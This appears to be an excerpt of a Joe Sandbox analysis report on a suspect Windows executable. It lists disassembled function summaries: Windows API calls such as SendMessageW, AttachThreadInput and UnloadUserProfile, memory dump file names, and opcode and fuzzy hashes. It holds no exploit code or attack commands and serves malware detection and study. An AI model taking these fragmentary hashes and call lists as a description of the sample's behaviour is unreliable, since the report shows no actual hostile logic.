                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastacceptselect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 385091864-0
                                                                                                                                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1358664141-0
                                                                                                                                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                                        APIs
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                        • __wsplitpath.LIBCMT ref: 00433950
                                                                                                                                        • __wcsicoll.LIBCMT ref: 00433974
                                                                                                                                        • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1187119602-0
                                                                                                                                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                                                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1597257046-0
                                                                                                                                        • Opcode ID: ffb306b0524748cf2939c1f0cf37236c46535da1521513c3132486090f10cb1b
                                                                                                                                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                                                        • Opcode Fuzzy Hash: ffb306b0524748cf2939c1f0cf37236c46535da1521513c3132486090f10cb1b
                                                                                                                                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                                                        • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 237123855-0
                                                                                                                                        • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                        • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                                                        • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                        • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteDestroyObject$IconWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3349847261-0
                                                                                                                                        • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                                        • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                                                        • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                                        • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2223660684-0
                                                                                                                                        • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                        • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                                        • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                        • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                                        • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                                        • EndPath.GDI32(?), ref: 00447336
                                                                                                                                        • StrokePath.GDI32(?), ref: 00447344
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2783949968-0
                                                                                                                                        • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                        • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                                        • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                        • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                        • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                        • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                                        • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                        • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                          • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                          • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 146765662-0
                                                                                                                                        • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                        • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                                        • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                        • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                                        APIs
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                                        • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                        • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                        • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                                        • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                        • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                                                        APIs
